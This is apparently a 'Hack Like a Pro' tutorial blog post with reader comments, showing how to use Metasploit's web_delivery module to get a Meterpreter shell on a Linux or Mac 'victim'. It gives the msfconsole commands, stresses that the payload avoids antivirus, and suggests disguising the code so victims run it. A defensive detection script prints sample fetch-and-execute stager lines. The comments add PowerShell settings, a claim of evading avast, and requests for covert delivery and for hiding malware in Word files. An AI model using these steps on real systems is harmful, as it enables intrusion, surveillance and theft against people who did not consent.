Hack Like a Pro: Metasploit for the Aspiring Hacker, Part 12 (Web Delivery for Linux or Mac)

Welcome back, my budding hackers!

Metasploit, one of my favorite hacking/pentesting tools, has so many capabilities that even after my many tutorials on it, I have only scratched the surface of its capabilities. For instance, it can be used with Nexpose for vulnerability scanning, with Nmap for port scanning, and, with its numerous auxiliary modules, for nearly unlimited other hacking-related tasks.

Among the exploit modules, a category that we have not addressed is the web delivery exploits. These exploits enable us to open a web server on the attack system and then generate a simple script command that, when executed on the victim system, will open a Meterpreter shell on the target. This web delivery exploit can use Python, PHP, or Windows PowerShell scripts.

Of course, it is your job to get the script onto the target machine. This means that you will likely need to get physical access to the system or envelop the code in a seemingly innocuous-looking object that the victim will be enticed to execute.

In this tutorial, we will exploit a Linux or Mac system. Since both are UNIX-like systems, they both have a built-in Python interpreter by default. If we can get the script command generated by this exploit onto the target, we can have complete control of the system, including keystroke logging, turning on the webcam, recording from the microphone, and reading or deleting any files on the system.

Let's get started.

Step 1: Open a Terminal

The first step, of course, is to fire up Kali and open a terminal.

Step 2: Start Metasploit & Load the Exploit

Next, start Metasploit by typing:

kali > msfconsole

This should open the msfconsole like that below.

Then we need to load the exploit:

msf > use exploit/multi/script/web_delivery

Set the IP of our attack system:

msf > set LHOST 192.168.181.153

And set the port we want to use:

msf > set LPORT 4444

Of course, I am using my private IP address in my lab, but if the target is outside your LAN, you will likely need to use your public IP and then port forward.

Step 3: Show Options

Now that we have the exploit loaded and ready to go, let's take a look at the options for this exploit. Type:

msf > show options

It looks like we have all the options set as we need. Now, let's get a bit more information on this exploit before we proceed. Type:

msf > info

As you can read above, this exploit starts a web server on our attack system and, when the generated command is executed on the target system, a payload is downloaded to the victim. In addition, this attack does not write the payload to disk (it runs in memory), so it should not trigger the antivirus software on the victim's system.

Step 4: Start the Exploit

Our next step is to run the exploit. This starts the web server on our attack system and also generates a Python command that, when run on the target, fetches the payload from that web server and executes it. Before we do that, though, we need to set the target to 0, selecting the Python version of the exploit.

msf > set target 0

Now, we can type exploit:

msf > exploit

Notice the last thing this exploit writes is "Run the following command on the target machine" followed by the command we need to use. Copy this command.

Step 5: Run the Command on the Victim System

Next, take that command to the victim machine. In this case, I'm using an Ubuntu 14.04 system. You will need to precede the command with sudo as it requires root privileges.

Then hit Enter. When you return to your Kali system, you can see a Meterpreter has been started on the target system! We own that box!

Initially, the Meterpreter is running in the background. To bring it to the foreground, we can type:

msf > sessions -l

This then lists the "active sessions." Notice that this session ID is "1." We then can activate that session by typing:

msf > sessions -i 1

This then brings the Meterpreter session to the foreground and we get the Meterpreter prompt! To control the system, we can run the Meterpreter commands or scripts, although most of the scripts are written for Windows systems.
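From the defender's side, the tell-tale feature of this technique is the generated command itself: a script interpreter launched with inline code that fetches a URL and executes the response in memory. Below is an added example (not part of the original tutorial) that scans constructed process-execution records for that fetch-and-execute shape; the record format, the sample lines and the 203.0.113.10 address are all made up for the demonstration.

```python
import re
from typing import Optional

# Interpreters that web_delivery stages through (Python, PHP, PowerShell), followed
# somewhere later on the command line by a flag that takes code inline instead of a file.
INLINE_CODE = re.compile(
    r"\b(python[0-9.]*|php|powershell(?:\.exe)?|pwsh)\b.*?\s(-c|-r|-Command|-EncodedCommand|-e)\b",
    re.IGNORECASE,
)
# The stager fetches its second stage over HTTP ...
FETCH = re.compile(r"urlopen|urllib|file_get_contents|WebClient|DownloadString|Invoke-WebRequest", re.IGNORECASE)
# ... and evaluates it in memory, which is why nothing lands on disk for antivirus to scan.
EVAL = re.compile(r"\b(exec|eval|IEX|Invoke-Expression)\b", re.IGNORECASE)
URL = re.compile(r"https?://[^\s'\")]+", re.IGNORECASE)


def classify(cmdline: str) -> Optional[dict]:
    """Return details if cmdline looks like an inline fetch-and-execute stager, else None."""
    m = INLINE_CODE.search(cmdline)
    if not (m and FETCH.search(cmdline) and EVAL.search(cmdline)):
        return None
    url = URL.search(cmdline)
    return {"interpreter": m.group(1).lower(), "flag": m.group(2), "url": url.group(0) if url else None}


def scan(records):
    """records: iterable of 'timestamp|user|cmdline' lines (constructed format, not a real log)."""
    hits = []
    for line in records:
        ts, user, cmdline = line.split("|", 2)
        verdict = classify(cmdline)
        if verdict:
            hits.append({"time": ts, "user": user, **verdict})
    return hits


# Constructed sample records: two benign interpreter launches and two stager-shaped ones.
SAMPLE = [
    "2016-03-01T10:01:02|alice|python manage.py runserver",
    "2016-03-01T10:02:15|bob|python -c \"print(2 + 2)\"",
    "2016-03-01T10:03:40|bob|python -c \"import urllib2; r = urllib2.urlopen('http://203.0.113.10:8080/Abc'); exec(r.read());\"",
    "2016-03-01T10:05:09|svc|powershell.exe -NoProfile -Command \"IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.10:8080/Def')\"",
]

if __name__ == "__main__":
    for hit in scan(SAMPLE):
        print(hit)
```

Feeding the same logic real auditd EXECVE or Sysmon process-creation events gives a cheap first-pass alert on web delivery stagers, with the extracted URL pointing at the attacker's listener for follow-up.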

Keep coming back, my budding hackers, as we continue to explore the most valuable skills of the 21st century—hacking!

18 Comments

Does anyone know of a Windows equivalent for this?
It would be really cool if you could do this in Windows!

Why? You could always host the payloads on a Windows-based web server if you wanted. Or you could install Metasploit on Windows, but I wouldn't recommend it.

I believe Trinity asked if it was possible to get a Meterpreter on Windows using this method. I guess it is possible as long as Python is installed.

-Phoenix750

There is also a PowerShell option for the target and that will work on all recent versions of Windows.

Ahh, that makes more sense. I misunderstood the question.

There is a Windows PowerShell option for this hack.

Awesome, the PowerShell works perfectly!
Solution:
set target 2 for PSH (PSH stands for PowerShell)
The default Python Meterpreter isn't compatible; instead use the Windows Meterpreter.
set payload windows/meterpreter/reverse_tcp
exploit/run and it gives you a PowerShell command to execute.
Tested on Windows 8.1 Pro with avast! installed and avast! did not catch it.

Hi! I've decided to start learning how to hack, so my first thing will be to learn some Linux basics. My question is will I have difficulties with mastering Kali if taking info from BackTrack tutorials? What shall I do? Should I start from BT or it doesn't really matter? Thank you!

No, you will not have difficulties because Kali is a newer version of BackTrack, though Kali has new stuff.

I guess BackTrack can gain you some good experience, but if you just wanna learn Linux basics it doesn't matter if it's Kali or BackTrack.

D3ATH

Thanks for the quick response!

I think it is possible with this exploit. Instead of choosing target 0, which is for Python, we select Windows command shell (maybe target 1). I will let you know, because I didn't try it yet.

OTW, can we write a small program, when the victim executes it, it will write that Python command line in the victim's Mac secretly? Or even bind the program with a pic which, when the victim opens it to see it (not download), it will execute itself secretly?

Hey Occupy,

I'm right now doing an apprenticeship in IT, and am in my third year.
Could you write something about the .Locky virus?
I had to deal with it at a customer's office which was infected, and all files were decrypted.
I found the virus in the registry.

I think it would be interesting how such a virus is made, hidden in an MS Word file and sent by email without the spam filter detecting it.

I would appreciate an answer, keep it up.

  File "<string>", line 1, in <module>
  File "/usr/lib/python2.7/urllib2.py", line 154, in urlopen
    return opener.open(url, data, timeout)
  File "/usr/lib/python2.7/urllib2.py", line 437, in open
    response = meth(req, response)
  File "/usr/lib/python2.7/urllib2.py", line 550, in http_response
    'http', request, response, code, msg, hdrs)
  File "/usr/lib/python2.7/urllib2.py", line 475, in error
    return self._call_chain(*args)
  File "/usr/lib/python2.7/urllib2.py", line 409, in _call_chain
    result = func(*args)
  File "/usr/lib/python2.7/urllib2.py", line 558, in http_error_default
    raise HTTPError(req.get_full_url(), code, msg, hdrs, fp)
urllib2.HTTPError: HTTP Error 404: File not found

I receive this at the victim machine.

Hey Occupytheweb,

Good article here, although I think I'm missing something. For step 5, it says to run that Python snippet on the victim's machine. Isn't the whole point of this tutorial to show how to get into the victim's machine? You also say we need to put sudo before that command, so we need the root password of the victim's machine we're going to attack... if we have that info then why even attack it? I'm just a little unsure as to how we get a victim to run a payload on their machine. For Windows, sure, that might be easy since opening a .exe file is just a double click, but on other machines like Linux and even OS X, payloads written in bash need things to be done like chmod +x first before they can even be run, and commands like that also need root privileges. Can you point me to some relevant info?

There was a video on Hak5 which demonstrated the use of a Rubber Ducky to get a reverse_tcp on a machine with physical access, and I was surprised at the method they used with web delivery to get the payload downloaded. Now this post explains it very clearly. Thank you for the awesomeness OTW ^^

So, how can we use this exploit for a victim with Windows?
